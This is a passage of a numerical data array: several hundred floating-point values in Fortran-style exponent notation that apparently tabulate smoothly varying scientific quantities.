0.25505664e01,
0.31431477e01,
0.38052323e01,
0.43142323e01,
0.45352106e01,
0.44408669e01,
0.40962334e01,
0.36127684e01,
0.30965683e01,
0.26170671e01,
0.22043598e01,
0.18349921e01,
0.22099471e01,
0.26385496e01,
0.29933913e01,
0.31896119e01,
0.31966636e01,
0.30375271e01,
0.27696035e01,
0.24563296e01,
0.21455364e01,
0.18630074e01,
0.16174023e01,
0.13863298e01,
0.16447055e01,
0.19445310e01,
0.22046304e01,
0.23685496e01,
0.24110959e01,
0.23400669e01,
0.21870027e01,
0.19907905e01,
0.17838671e01,
0.15866874e01,
0.14085795e01,
0.12514458e01,
0.10881330e01,
0.12770401e01,
0.14988452e01,
0.16977799e01,
0.18342333e01,
0.18884524e01,
0.18623250e01,
0.17742110e01,
0.16486713e01,
0.15075257e01,
0.13662242e01,
0.12339157e01,
0.11142954e01,
0.10071722e01,
0.88128895e00,
0.10257436e01,
0.11969687e01,
0.13544649e01,
0.14691297e01,
0.15254281e01,
0.15228883e01,
0.14728941e01,
0.13916924e01,
0.12941229e01,
0.11911522e01,
0.10903227e01,
0.99648142e00,
0.91146982e00,
0.83437926e00,
0.73236907e00,
0.84691751e00,
0.98372436e00,
0.11120189e01,
0.12095475e01,
0.12638915e01,
0.12736813e01,
0.12464422e01,
0.11935405e01,
0.11255139e01,
0.10501394e01,
0.97279239e00,
0.89753741e00,
0.82755452e00,
0.76412642e00,
0.70607662e00,
0.62143141e00,
0.71498531e00,
0.82739562e00,
0.93439400e00,
0.10183749e01,
0.10692183e01,
0.10852710e01,
0.10717980e01,
0.10371528e01,
0.98918498e00,
0.93369889e00,
0.87458736e00,
0.81457925e00,
0.75610143e00,
0.70160747e00,
0.65229672e00,
0.60690910e00,
0.53620493e00,
0.61444676e00,
0.70891893e00,
0.79989344e00,
0.87304217e00,
0.91996312e00,
0.93897974e00,
0.93395931e00,
0.91129071e00,
0.87703383e00,
0.83570266e00,
0.79033947e00,
0.74295175e00,
0.69498348e00,
0.64796978e00,
0.60397410e00,
0.56429613e00,
0.52768981e00,
0.46893141e00,
0.53562319e00,
0.61647099e00,
0.69504291e00,
0.75940472e00,
0.80246264e00,
0.82262319e00,
0.82284969e00,
0.80819505e00,
0.78347129e00,
0.75227189e00,
0.71705294e00,
0.67947024e00,
0.64061898e00,
0.60127056e00,
0.56240505e00,
0.52581406e00,
0.49295956e00,
0.46267310e00,
0.41456842e00,
0.47228998e00,
0.54249328e00,
0.61122215e00,
0.66834646e00,
0.70778871e00,
0.72807664e00,
0.73156416e00,
0.72236371e00,
0.70439237e00,
0.68056595e00,
0.65288788e00,
0.62274611e00,
0.59110469e00,
0.55858999e00,
0.52560019e00,
0.49273926e00,
0.46156633e00,
0.43370983e00,
0.40812615e00,
0.36973703e00,
0.42031151e00,
0.48198968e00,
0.54273206e00,
0.59380746e00,
0.62994283e00,
0.64979416e00,
0.65528655e00,
0.64984703e00,
0.63673460e00,
0.61836016e00,
0.59637630e00,
0.57194269e00,
0.54589856e00,
0.51883745e00,
0.49112943e00,
0.46296096e00,
0.43467191e00,
0.40760121e00,
0.38351870e00,
0.36154264e00,
0.33207551e00,
0.37681752e00,
0.43150941e00,
0.48563948e00,
0.53159100e00,
0.56474036e00,
0.58386314e00,
0.59056675e00,
0.58775848e00,
0.57819819e00,
0.56391406e00,
0.54628950e00,
0.52629930e00,
0.50466305e00,
0.48191690e00,
0.45844156e00,
0.43446112e00,
0.41004205e00,
0.38533735e00,
0.36147287e00,
0.34032100e00,
0.32119045e00,
0.29983068e00,
0.33969635e00,
0.38853076e00,
0.43707687e00,
0.47863159e00,
0.50910699e00,
0.52738410e00,
0.53481984e00,
0.53390729e00,
0.52700996e00,
0.51585591e00,
0.50161958e00,
0.48513207e00,
0.46701470e00,
0.44774175e00,
0.42767024e00,
0.40705225e00,
0.38602614e00,
0.36459178e00,
0.34277132e00,
0.32148623e00,
0.30266759e00,
0.28583673e00,
0.27165741e00,
0.30735224e00,
0.35116890e00,
0.39490715e00,
0.43263298e00,
0.46071306e00,
0.47812337e00,
0.48601636e00,
0.48654056e00,
0.48172772e00,
0.47305444e00,
0.46152285e00,
0.44784895e00,
0.43257853e00,
0.41613755e00,
0.39885530e00,
0.38097894e00,
0.36268044e00,
0.34404564e00,
0.32503796e00,
0.30558982e00,
0.28643203e00,
0.26951250e00,
0.25458133e00,
0.24664548e00,
0.27872956e00,
0.31819224e00,
0.35773003e00,
0.39206341e00,
0.41795400e00,
0.43447414e00,
0.44261932e00,
0.44425684e00,
0.44113833e00,
0.43451858e00,
0.42523941e00,
0.41390744e00,
0.40100044e00,
0.38690761e00,
0.37194157e00,
0.35634446e00,
0.34029481e00,
0.32391262e00,
0.30725011e00,
0.29025167e00,
0.27279079e00,
0.25542563e00,
0.24008393e00,
0.22675417e00,
0.22445151e00,
0.25343820e00,
0.28914347e00,
0.32500827e00,
0.35629919e00,
0.38011837e00,
0.39564186e00,
0.40376574e00,
0.40615430e00,
0.40434766e00,
0.39941984e00,
0.39206272e00,
0.38276103e00,
0.37190381e00,
0.35982931e00,
0.34683278e00,
0.33315977e00,
0.31900054e00,
0.30449098e00,
0.28971705e00,
0.27470860e00,
0.25940111e00,
0.24363182e00,
0.22780687e00,
0.21380231e00,
0.20184751e00,
0.20519748e00,
0.23159876e00,
0.26413625e00,
0.29684672e00,
0.32543322e00,
0.34727564e00,
0.36164755e00,
0.36939174e00,
0.37204832e00,
0.37103242e00,
0.36731219e00,
0.36147776e00,
0.35390341e00,
0.34486532e00,
0.33460709e00,
0.32336712e00,
0.31137651e00,
0.29884037e00,
0.28591970e00,
0.27272525e00,
0.25932097e00,
0.24572186e00,
0.23185994e00,
0.21755250e00,
0.20307408e00,
0.19022347e00,
0.17946769e00,
0.18898228e00,
0.21327148e00,
0.24319792e00,
0.27327064e00,
0.29953399e00,
0.31957966e00,
0.33274972e00,
0.33984205e00,
0.34230980e00,
0.34150216e00,
0.33835727e00,
0.33344826e00,
0.32711285e00,
0.31955174e00,
0.31089956e00,
0.30128181e00,
0.29084933e00,
0.27977982e00,
0.26825124e00,
0.25640994e00,
0.24435396e00,
0.23213391e00,
0.21975470e00,
0.20714773e00,
0.19412118e00,
0.18083785e00,
0.16899987e00,
0.15930425e00,
0.17541476e00,
0.19795303e00,
0.22571321e00,
0.25359881e00,
0.27793473e00,
0.29647639e00,
0.30860057e00,
0.31503823e00,
0.31714112e00,
0.31618607e00,
0.31309542e00,
0.30847403e00,
0.30271024e00,
0.29603517e00,
0.28855911e00,
0.28031746e00,
0.27133235e00,
0.26166755e00,
0.25144571e00,
0.24082130e00,
0.22993420e00,
0.21887848e00,
0.20769787e00,
0.19639082e00,
0.18488961e00,
0.17300032e00,
0.16079190e00,
0.14985578e00,
0.14110740e00,
0.16366631e00,
0.18467116e00,
0.21054901e00,
0.23656210e00,
0.25929046e00,
0.27663431e00,
0.28799024e00,
0.29400581e00,
0.29590416e00,
0.29484844e00,
0.29169577e00,
0.28704572e00,
0.28133944e00,
0.27490255e00,
0.26794240e00,
0.26054066e00,
0.25267535e00,
0.24428359e00,
0.23534042e00,
0.22590491e00,
0.21610361e00,
0.20607288e00,
0.19590905e00,
0.18565454e00,
0.17530420e00,
0.16479163e00,
0.15392394e00,
0.14269111e00,
0.13256522e00,
0.12466694e00,
0.15291582e00,
0.17249423e00,
0.19663572e00,
0.22094680e00,
0.24225558e00,
0.25860691e00,
0.26942277e00,
0.27527362e00,
0.27725279e00,
0.27639005e00,
0.27343193e00,
0.26890206e00,
0.26321408e00,
0.25673062e00,
0.24976483e00,
0.24254556e00,
0.23517576e00,
0.22762197e00,
0.21976374e00,
0.21149129e00,
0.20278960e00,
0.19374785e00,
0.18449736e00,
0.17514092e00,
0.16572388e00,
0.15623912e00,
0.14661992e00,
0.13667518e00,
0.12632957e00,
0.11693286e00,
0.10979707e00,
0.14267196e00,
0.16087982e00,
0.18335804e00,
0.20604582e00,
0.22601375e00,
0.24145372e00,
0.25182438e00,
0.25763780e00,
0.25987828e00,
0.25945812e00,
0.25701439e00,
0.25296855e00,
0.24764267e00,
0.24133593e00,
0.23435625e00,
0.22701317e00,
0.21957387e00,
0.21219650e00,
0.20488037e00,
0.19748402e00,
0.18982655e00,
0.18181197e00,
0.17347980e00,
0.16495080e00,
0.15633532e00,
0.14768384e00,
0.13898759e00,
0.13017787e00,
0.12106603e00,
0.11152479e00,
0.10278418e00,
0.96333064e-01,
0.13278867e00,
0.14967601e00,
0.17054874e00,
0.19166234e00,
0.21031891e00,
0.22485405e00,
0.23476954e00,
0.24053511e00,
0.24305005e00,
0.24313784e00,
0.24135487e00,
0.23804264e00,
0.23343392e00,
0.22772875e00,
0.22114034e00,
0.21392128e00,
0.20636588e00,
0.19877388e00,
0.19137226e00,
0.18422794e00,
0.17721902e00,
0.17011781e00,
0.16274700e00,
0.15508358e00,
0.14722840e00,
0.13929746e00,
0.13134745e00,
0.12336826e00,
0.11528943e00,
0.10692697e00,
0.98114364e-01,
0.89966424e-01,
0.84133029e-01,
0.12330588e00,
0.13893479e00,
0.15827183e00,
0.17786814e00,
0.19524175e00,
0.20886324e00,
0.21827731e00,
0.22391967e00,
0.22662000e00,
0.22713451e00,
0.22596700e00,
0.22341314e00,
0.21965274e00,
0.21481460e00,
0.20901735e00,
0.20240258e00,
0.19516377e00,
0.18756257e00,
0.17991112e00,
0.17249928e00,
0.16548070e00,
0.15879016e00,
0.15218471e00,
0.14541364e00,
0.13838096e00,
0.13115591e00,
0.12385615e00,
0.11654575e00,
0.10921578e00,
0.10179584e00,
0.94108447e-01,
0.85958004e-01,
0.78349575e-01,
0.73076993e-01,
0.11430455e00,
0.12874915e00,
0.14663576e00,
0.16478880e00,
0.18092515e00,
0.19363941e00,
0.20251557e00,
0.20795847e00,
0.21073578e00,
0.21154700e00,
0.21085797e00,
0.20893978e00,
0.20595059e00,
0.20198931e00,
0.19712524e00,
0.19142093e00,
0.18495877e00,
0.17787308e00,
0.17037868e00,
0.16277534e00,
0.15539503e00,
0.14847951e00,
0.14204761e00,
0.13587566e00,
0.12965593e00,
0.12321350e00,
0.11657458e00,
0.10985404e00,
0.10312499e00,
0.96382633e-01,
0.89558579e-01,
0.82482606e-01,
0.74937083e-01,
0.67823343e-01,
0.63062489e-01,
0.10584079e00,
0.11918116e00,
0.13571160e00,
0.15250790e00,
0.16746905e00,
0.17930275e00,
0.18762796e00,
0.19281991e00,
0.19558841e00,
0.19658093e00,
0.19623034e00,
0.19479063e00,
0.19241145e00,
0.18918501e00,
0.18516850e00,
0.18039672e00,
0.17489515e00,
0.16870056e00,
0.16189243e00,
0.15463088e00,
0.14718156e00,
0.13989125e00,
0.13307634e00,
0.12685405e00,
0.12105249e00,
0.11533057e00,
0.10943508e00,
0.10333905e00,
0.97149357e-01,
0.90949543e-01,
0.84741533e-01,
0.78459755e-01,
0.71940817e-01,
0.64950287e-01,
0.58292422e-01,
0.53999700e-01,
0.97934157e-01,
0.11025076e00,
0.12552127e00,
0.14105226e00,
0.15490949e00,
0.16590366e00,
0.17368492e00,
0.17860012e00,
0.18130451e00,
0.18239634e00,
0.18227696e00,
0.18118428e00,
0.17926148e00,
0.17660023e00,
0.17325978e00,
0.16927499e00,
0.16466121e00,
0.15942113e00,
0.15355882e00,
0.14710733e00,
0.14017075e00,
0.13296603e00,
0.12582819e00,
0.11912578e00,
0.11307607e00,
0.10758535e00,
0.10230618e00,
0.96913703e-01,
0.91320075e-01,
0.85618503e-01,
0.79903029e-01,
0.74183889e-01,
0.68398476e-01,
0.62389236e-01,
0.55908926e-01,
0.49671900e-01,
0.45807466e-01,
0.90577021e-01,
0.10194721e00,
0.11605130e00,
0.13040775e00,
0.14323507e00,
0.15343815e00,
0.16069512e00,
0.16532598e00,
0.16793491e00,
0.16907367e00,
0.16911317e00,
0.16827461e00,
0.16669342e00,
0.16445951e00,
0.16163501e00,
0.15826119e00,
0.15436088e00,
0.14993919e00,
0.14498582e00,
0.13948333e00,
0.13342866e00,
0.12687427e00,
0.11998184e00,
0.11305442e00,
0.10648688e00,
0.10058656e00,
0.95354967e-01,
0.90465494e-01,
0.85533582e-01,
0.80405675e-01,
0.75155161e-01,
0.69885492e-01,
0.64615801e-01,
0.59286319e-01,
0.53744264e-01,
0.47732841e-01,
0.41884389e-01,
0.38411867e-01,
0.83746620e-01,
0.94243065e-01,
0.10726915e00,
0.12053798e00,
0.13240825e00,
0.14187106e00,
0.14862999e00,
0.15297991e00,
0.15547749e00,
0.15663114e00,
0.15678266e00,
0.15613645e00,
0.15481880e00,
0.15291539e00,
0.15048827e00,
0.14758278e00,
0.14422987e00,
0.14044581e00,
0.13623075e00,
0.13156785e00,
0.12642694e00,
0.12077967e00,
0.11463551e00,
0.10810074e00,
0.10143317e00,
0.95029272e-01,
0.89268476e-01,
0.84254339e-01,
0.79705626e-01,
0.75194120e-01,
0.70498869e-01,
0.65667070e-01,
0.60809318e-01,
0.55953730e-01,
0.51043399e-01,
0.45929730e-01,
0.40349029e-01,
0.34859274e-01,
0.31745121e-01,
0.77413671e-01,
0.87103941e-01,
0.99134557e-01,
0.11139757e00,
0.12238043e00,
0.13115339e00,
0.13744320e00,
0.14152151e00,
0.14390105e00,
0.14504991e00,
0.14528263e00,
0.14478727e00,
0.14368038e00,
0.14204189e00,
0.13993120e00,
0.13739403e00,
0.13446525e00,
0.13116941e00,
0.12751934e00,
0.12351336e00,
0.11913250e00,
0.11434042e00,
0.10909266e00,
0.10336579e00,
0.97215243e-01,
0.90846524e-01,
0.84636919e-01,
0.79015903e-01,
0.74187510e-01,
0.69935963e-01,
0.65807395e-01,
0.61514482e-01,
0.57072140e-01,
0.52595474e-01,
0.48121743e-01,
0.43596964e-01,
0.38876079e-01,
0.33690531e-01,
0.28531600e-01,
0.25744777e-01,
0.71547434e-01,
0.80494061e-01,
0.91605820e-01,
0.10293934e00,
0.11310040e00,
0.12123200e00,
0.12708212e00,
0.13090093e00,
0.13316067e00,
0.13429219e00,
0.13458471e00,
0.13421088e00,
0.13327757e00,
0.13185826e00,
0.13000821e00,
0.12777114e00,
0.12518245e00,
0.12227035e00,
0.11905541e00,
0.11554869e00,
0.11174847e00,
0.10763626e00,
0.10317403e00,
0.98308414e-01,
0.92992358e-01,
0.87237559e-01,
0.81194960e-01,
0.75207628e-01,
0.69733076e-01,
0.65067738e-01,
0.61075501e-01,
0.57294834e-01,
0.53375702e-01,
0.49295910e-01,
0.45172136e-01,
0.41050550e-01,
0.36880266e-01,
0.32519296e-01,
0.27695602e-01,
0.22840958e-01,
0.20352198e-01,
0.66117376e-01,
0.74378133e-01,
0.84641933e-01,
0.95116824e-01,
0.10451740e00,
0.11205351e00,
0.11749266e00,
0.12106522e00,
0.12320609e00,
0.12431186e00,
0.12464833e00,
0.12437376e00,
0.12358582e00,
0.12235164e00,
0.12072182e00,
0.11873700e00,
0.11643104e00,
0.11383259e00,
0.11096542e00,
0.10784754e00,
0.10448926e00,
0.10088971e00,
0.97032204e-01,
0.92879705e-01,
0.88374905e-01,
0.83454721e-01,
0.78095064e-01,
0.72394073e-01,
0.66651307e-01,
0.61332978e-01,
0.56815393e-01,
0.53050254e-01,
0.49585145e-01,
0.46012942e-01,
0.42270541e-01,
0.38473442e-01,
0.34676433e-01,
0.30831696e-01,
0.26799770e-01,
0.22306219e-01,
0.17730433e-01,
0.15513073e-01,
0.61093956e-01,
0.68722166e-01,
0.78203514e-01,
0.87885372e-01,
0.96582450e-01,
0.10356604e00,
0.10862161e00,
0.11196126e00,
0.11398555e00,
0.11505950e00,
0.11542739e00,
0.11523422e00,
0.11456916e00,
0.11349328e00,
0.11205266e00,
0.11028446e00,
0.10822011e00,
0.10588704e00,
0.10330941e00,
0.10050797e00,
0.97499035e-01,
0.94292536e-01,
0.90888672e-01,
0.87273069e-01,
0.83411098e-01,
0.79244599e-01,
0.74700132e-01,
0.69725469e-01,
0.64370766e-01,
0.58887802e-01,
0.53736102e-01,
0.49357101e-01,
0.45792568e-01,
0.42613342e-01,
0.39362472e-01,
0.35933696e-01,
0.32438610e-01,
0.28940061e-01,
0.25393331e-01,
0.21661280e-01,
0.17468622e-01,
0.13150477e-01,
0.11185951e-01,
0.56448560e-01,
0.63493401e-01,
0.72252735e-01,
0.81202179e-01,
0.89248493e-01,
0.95719531e-01,
0.10041723e00,
0.10353691e00,
0.10544755e00,
0.10648517e00,
0.10687432e00,
0.10674787e00,
0.10618718e00,
0.10524774e00,
0.10397130e00,
0.10239167e00,
0.10053762e00,
0.98434702e-01,
0.96106045e-01,
0.93572617e-01,
0.90852953e-01,
0.87962106e-01,
0.84909752e-01,
0.81697099e-01,
0.78312054e-01,
0.74722745e-01,
0.70871852e-01,
0.66679642e-01,
0.62072858e-01,
0.57060491e-01,
0.51846057e-01,
0.46870694e-01,
0.42625420e-01,
0.39239943e-01,
0.36319576e-01,
0.33365458e-01,
0.30227283e-01,
0.27010450e-01,
0.23785481e-01,
0.20511542e-01,
0.17054949e-01,
0.13141878e-01,
0.90698684e-02,
0.73469649e-02,
0.52153420e-01,
0.58660157e-01,
0.66753164e-01,
0.75026073e-01,
0.82470380e-01,
0.88465959e-01,
0.92829920e-01,
0.95742144e-01,
0.97542584e-01,
0.98540656e-01,
0.98942772e-01,
0.98870747e-01,
0.98398849e-01,
0.97577512e-01,
0.96444599e-01,
0.95030688e-01,
0.93361929e-01,
0.91461726e-01,
0.89351647e-01,
0.87051816e-01,
0.84580876e-01,
0.81955560e-01,
0.79189852e-01,
0.76293178e-01,
0.73267482e-01,
0.70102490e-01,
0.66768855e-01,
0.63210987e-01,
0.59346184e-01,
0.55086352e-01,
0.50406374e-01,
0.45463238e-01,
0.40671837e-01,
0.36558144e-01,
0.33334181e-01,
0.30647837e-01,
0.27966481e-01,
0.25096513e-01,
0.22136096e-01,
0.19164244e-01,
0.16145656e-01,
0.12950187e-01,
0.93025165e-02,
0.54607159e-02,
0.39474810e-02,
0.48182234e-01,
0.54192506e-01,
0.61670437e-01,
0.69318332e-01,
0.76205671e-01,
0.81760220e-01,
0.85813068e-01,
0.88529900e-01,
0.90223983e-01,
0.91180287e-01,
0.91588661e-01,
0.91560833e-01,
0.91164641e-01,
0.90445958e-01,
0.89439072e-01,
0.88171646e-01,
0.86667374e-01,
0.84947526e-01,
0.83031908e-01,
0.80939271e-01,
0.78687482e-01,
0.76293327e-01,
0.73772058e-01,
0.71136616e-01,
0.68396017e-01,
0.65552600e-01,
0.62597387e-01,
0.59503239e-01,
0.56216817e-01,
0.52654829e-01,
0.48719283e-01,
0.44357602e-01,
0.39683431e-01,
0.35080492e-01,
0.31097105e-01,
0.28020034e-01,
0.25545072e-01,
0.23114407e-01,
0.20494236e-01,
0.17775815e-01,
0.15046233e-01,
0.12272255e-01,
0.93193343e-02,
0.59020361e-02,
0.22407323e-02,
0.87492354e-03,
0.44510506e-01,
0.50062627e-01,
0.56972671e-01,
0.64043038e-01,
0.70415020e-01,
0.75560495e-01,
0.79323418e-01,
0.81856459e-01,
0.83448350e-01,
0.84361628e-01,
0.84770963e-01,
0.84778860e-01,
0.84447332e-01,
0.83818108e-01,
0.82922280e-01,
0.81784874e-01,
0.80427296e-01,
0.78868859e-01,
0.77127583e-01,
0.75220726e-01,
0.73164918e-01,
0.70976183e-01,
0.68669744e-01,
0.66259526e-01,
0.63757502e-01,
0.61172180e-01,
0.58505908e-01,
0.55750374e-01,
0.52880324e-01,
0.49845133e-01,
0.46562638e-01,
0.42928446e-01,
0.38867969e-01,
0.34455679e-01,
0.30041935e-01,
0.26187586e-01,
0.23246434e-01,
0.20965882e-01,
0.18771386e-01,
0.16391607e-01,
0.13906728e-01,
0.11403601e-01,
0.88423118e-02,
0.60800756e-02,
0.28280553e-02,
-0.70986536e-03,
-0.19648359e-02,
0.41115671e-01,
0.46244897e-01,
0.52630525e-01,
0.59167176e-01,
0.65062307e-01,
0.69828428e-01,
0.73321380e-01,
0.75681835e-01,
0.77175975e-01,
0.78045711e-01,
0.78451805e-01,
0.78488372e-01,
0.78212120e-01,
0.77661060e-01,
0.76863378e-01,
0.75841703e-01,
0.74615397e-01,
0.73201917e-01,
0.71617633e-01,
0.69878295e-01,
0.67999192e-01,
0.65995254e-01,
0.63880973e-01,
0.61670251e-01,
0.59375945e-01,
0.57009004e-01,
0.54577064e-01,
0.52082047e-01,
0.49516134e-01,
0.46855822e-01,
0.44053324e-01,
0.41028392e-01,
0.37672661e-01,
0.33894073e-01,
0.29732887e-01,
0.25506891e-01,
0.21783372e-01,
0.18975813e-01,
0.16882956e-01,
0.14915733e-01,
0.12760971e-01,
0.10479322e-01,
0.81534600e-02,
0.57432470e-02,
0.31131236e-02,
-0.13105665e-04,
-0.34361165e-02,
-0.45660972e-02,
0.37977196e-01,
0.42716030e-01,
0.48617344e-01,
0.54660756e-01,
0.60114693e-01,
0.64529106e-01,
0.67770794e-01,
0.69969401e-01,
0.71370378e-01,
0.72196685e-01,
0.72596297e-01,
0.72655670e-01,
0.72426699e-01,
0.71944013e-01,
0.71233213e-01,
0.70314772e-01,
0.69206156e-01,
0.67923151e-01,
0.66480570e-01,
0.64892717e-01,
0.63173585e-01,
0.61336990e-01,
0.59396494e-01,
0.57365343e-01,
0.55256244e-01,
0.53080887e-01,
0.50849102e-01,
0.48567444e-01,
0.46237227e-01,
0.43851011e-01,
0.41386928e-01,
0.38799874e-01,
0.36011849e-01,
0.32912444e-01,
0.29396715e-01,
0.25476838e-01,
0.21440787e-01,
0.17856820e-01,
0.15185956e-01,
0.13268581e-01,
0.11497635e-01,
0.95190108e-02,
0.73810630e-02,
0.51771011e-02,
0.28821086e-02,
0.37416635e-03,
-0.26154167e-02,
-0.58998531e-02,
-0.68843709e-02,
0.35076261e-01,
0.39454699e-01,
0.44908728e-01,
0.50496329e-01,
0.55542119e-01,
0.59630550e-01,
0.62638551e-01,
0.64685628e-01,
0.65998107e-01,
0.66781543e-01,
0.67172192e-01,
0.67249492e-01,
0.67060962e-01,
0.66638172e-01,
0.66004358e-01,
0.65178059e-01,
0.64175054e-01,
0.63009582e-01,
0.61695036e-01,
0.60244419e-01,
0.58670532e-01,
0.56986067e-01,
0.55203587e-01,
0.53335473e-01,
0.51393870e-01,
0.49390342e-01,
0.47335327e-01,
0.45237295e-01,
0.43101642e-01,
0.40929142e-01,
0.38712744e-01,
0.36432110e-01,
0.34044892e-01,
0.31476185e-01,
0.28615938e-01,
0.25350343e-01,
0.21667363e-01,
0.17823832e-01,
0.14378536e-01,
0.11824818e-01,
0.10038571e-01,
0.84049767e-02,
0.65482627e-02,
0.45205113e-02,
0.24313403e-02,
0.26542676e-03,
-0.20983638e-02,
-0.49343021e-02,
-0.80712391e-02,
-0.89136148e-02,
0.32395583e-01,
0.36441319e-01,
0.41482292e-01,
0.46648715e-01,
0.51316999e-01,
0.55103421e-01,
0.57894230e-01,
0.59799597e-01,
0.61028276e-01,
0.61769772e-01,
0.62149592e-01,
0.62240742e-01,
0.62086754e-01,
0.61716419e-01,
0.61150856e-01,
0.60406826e-01,
0.59498589e-01,
0.58439020e-01,
0.57240289e-01,
0.55914193e-01,
0.54472402e-01,
0.52926507e-01,
0.51288098e-01,
0.49568728e-01,
0.47779780e-01,
0.45932278e-01,
0.44036478e-01,
0.42101391e-01,
0.40134147e-01,
0.38139164e-01,
0.36116980e-01,
0.34061395e-01,
0.31954251e-01,
0.29756844e-01,
0.27398031e-01,
0.24767753e-01,
0.21741455e-01,
0.18279733e-01,
0.14604551e-01,
0.11262298e-01,
0.87792939e-02,
0.70768204e-02,
0.55486909e-02,
0.38075072e-02,
0.19052560e-02,
-0.45109729e-04,
-0.20623163e-02,
-0.42746197e-02,
-0.69636726e-02,
-0.99668913e-02,
-0.10686405e-01,
0.29919144e-01,
0.33657782e-01,
0.38317338e-01,
0.43094639e-01,
0.47413833e-01,
0.50920542e-01,
0.53509615e-01,
0.55282630e-01,
0.56432150e-01,
0.57132918e-01,
0.57500545e-01,
0.57602141e-01,
0.57477590e-01,
0.57153169e-01,
0.56648072e-01,
0.55977501e-01,
0.55154376e-01,
0.54190353e-01,
0.53096451e-01,
0.51883381e-01,
0.50561778e-01,
0.49142279e-01,
0.47635533e-01,
0.46052203e-01,
0.44402875e-01,
0.42697888e-01,
0.40947042e-01,
0.39159160e-01,
0.37341885e-01,
0.35501439e-01,
0.33642113e-01,
0.31765264e-01,
0.29866640e-01,
0.27930658e-01,
0.25920473e-01,
0.23763975e-01,
0.21344284e-01,
0.18521296e-01,
0.15230944e-01,
0.11671958e-01,
0.83932094e-02,
0.59620556e-02,
0.43443809e-02,
0.29380166e-02,
0.13360849e-02,
-0.42020026e-03,
-0.22225457e-02,
-0.40951176e-02,
-0.61711343e-02,
-0.87360274e-02,
-0.11627702e-01,
-0.12245870e-01,
0.27632145e-01,
0.31087343e-01,
0.35394758e-01,
0.39812610e-01,
0.43809064e-01,
0.47056779e-01,
0.49458548e-01,
0.51108032e-01,
0.52182894e-01,
0.52844279e-01,
0.53198714e-01,
0.53307895e-01,
0.53208377e-01,
0.52924160e-01,
0.52472707e-01,
0.51867817e-01,
0.51121201e-01,
0.50243411e-01,
0.49244415e-01,
0.48133992e-01,
0.46921846e-01,
0.45617707e-01,
0.44231363e-01,
0.42772591e-01,
0.41251190e-01,
0.39676767e-01,
0.38058497e-01,
0.36404900e-01,
0.34723751e-01,
0.33022195e-01,
0.31306833e-01,
0.29583117e-01,
0.27853649e-01,
0.26114259e-01,
0.24346959e-01,
0.22509510e-01,
0.20522581e-01,
0.18262342e-01,
0.15582572e-01,
0.12412144e-01,
0.89437887e-02,
0.57348427e-02,
0.33833538e-02,
0.18811167e-02,
0.61761297e-03,
-0.83635934e-03,
-0.24498748e-02,
-0.41174246e-02,
-0.58653555e-02,
-0.78286622e-02,
-0.10294430e-01,
-0.13095230e-01,
-0.13630256e-01,
0.25520688e-01,
0.28714316e-01,
0.32696646e-01,
0.36782503e-01,
0.40480625e-01,
0.43488596e-01,
0.45716532e-01,
0.47250807e-01,
0.48255347e-01,
0.48878800e-01,
0.49219336e-01,
0.49333718e-01,
0.49255468e-01,
0.49006518e-01,
0.48602745e-01,
0.48056658e-01,
0.47378853e-01,
0.46578914e-01,
0.45665938e-01,
0.44648807e-01,
0.43536380e-01,
0.42337555e-01,
0.41061286e-01,
0.39716586e-01,
0.38312454e-01,
0.36857765e-01,
0.35361193e-01,
0.33831026e-01,
0.32275263e-01,
0.30701900e-01,
0.29118838e-01,
0.27533358e-01,
0.25950057e-01,
0.24367830e-01,
0.22775861e-01,
0.21148378e-01,
0.19438008e-01,
0.17566392e-01,
0.15416590e-01,
0.12849388e-01,
0.97933495e-02,
0.64339326e-02,
0.33275706e-02,
0.10872351e-02,
-0.28362754e-03,
-0.14064757e-02,
-0.27260752e-02,
-0.42158812e-02,
-0.57702521e-02,
-0.74158944e-02,
-0.92886547e-02,
-0.11677106e-01,
-0.14403825e-01,
-0.14870039e-01,
0.23571694e-01,
0.26523935e-01,
0.30206172e-01,
0.33985410e-01,
0.37407782e-01,
0.40193867e-01,
0.42260528e-01,
0.43687437e-01,
0.44625875e-01,
0.45212984e-01,
0.45539256e-01,
0.45656916e-01,
0.45596711e-01,
0.45378670e-01,
0.45017261e-01,
0.44523854e-01,
0.43908067e-01,
0.43178570e-01,
0.42343616e-01,
0.41411307e-01,
0.40389728e-01,
0.39287016e-01,
0.38111381e-01,
0.36871076e-01,
0.35574421e-01,
0.34229808e-01,
0.32845549e-01,
0.31430013e-01,
0.29991681e-01,
0.28539073e-01,
0.27080379e-01,
0.25622051e-01,
0.24167063e-01,
0.22712942e-01,
0.21250511e-01,
0.19763654e-01,
0.18227577e-01,
0.16602959e-01,
0.14823279e-01,
0.12781378e-01,
0.10339825e-01,
0.74180500e-02,
0.41875704e-02,
0.12003324e-02,
-0.92070986e-03,
-0.21659597e-02,
-0.31659470e-02,
-0.43731593e-02,
-0.57607451e-02,
-0.72222133e-02,
-0.87847579e-02,
-0.10585406e-01,
-0.12914552e-01,
-0.15580352e-01,
-0.15989216e-01,
0.21772955e-01,
0.24502428e-01,
0.27907638e-01,
0.31403694e-01,
0.34571216e-01,
0.37151974e-01,
0.39069071e-01,
0.40396009e-01,
0.41272413e-01,
0.41824844e-01,
0.42136710e-01,
0.42256072e-01,
0.42211138e-01,
0.42020235e-01,
0.41696560e-01,
0.41250426e-01,
0.40690560e-01,
0.40024836e-01,
0.39260726e-01,
0.38405582e-01,
0.37466776e-01,
0.36451757e-01,
0.35368055e-01,
0.34223344e-01,
0.33025496e-01,
0.31782612e-01,
0.30503126e-01,
0.29195679e-01,
0.27868953e-01,
0.26531136e-01,
0.25188750e-01,
0.23845278e-01,
0.22500057e-01,
0.21148371e-01,
0.19782964e-01,
0.18395819e-01,
0.16978383e-01,
0.15516935e-01,
0.13982293e-01,
0.12313342e-01,
0.10401287e-01,
0.81002032e-02,
0.53164582e-02,
0.22110264e-02,
-0.66281413e-03,
-0.26719193e-02,
-0.38054741e-02,
-0.47028475e-02,
-0.58184257e-02,
-0.71222009e-02,
-0.85073700e-02,
-0.10002246e-01,
-0.11745773e-01,
-0.14030821e-01,
-0.16646272e-01,
-0.17007222e-01,
0.20113155e-01,
0.22637051e-01,
0.25786523e-01,
0.29021049e-01,
0.31953044e-01,
0.34343820e-01,
0.36122233e-01,
0.37356097e-01,
0.38174324e-01,
0.38693711e-01,
0.38991190e-01,
0.39110996e-01,
0.39079025e-01,
0.38912032e-01,
0.38622018e-01,
0.38218360e-01,
0.37708975e-01,
0.37100986e-01,
0.36401182e-01,
0.35616249e-01,
0.34752883e-01,
0.33817910e-01,
0.32818370e-01,
0.31761579e-01,
0.30655265e-01,
0.29507659e-01,
0.28327364e-01,
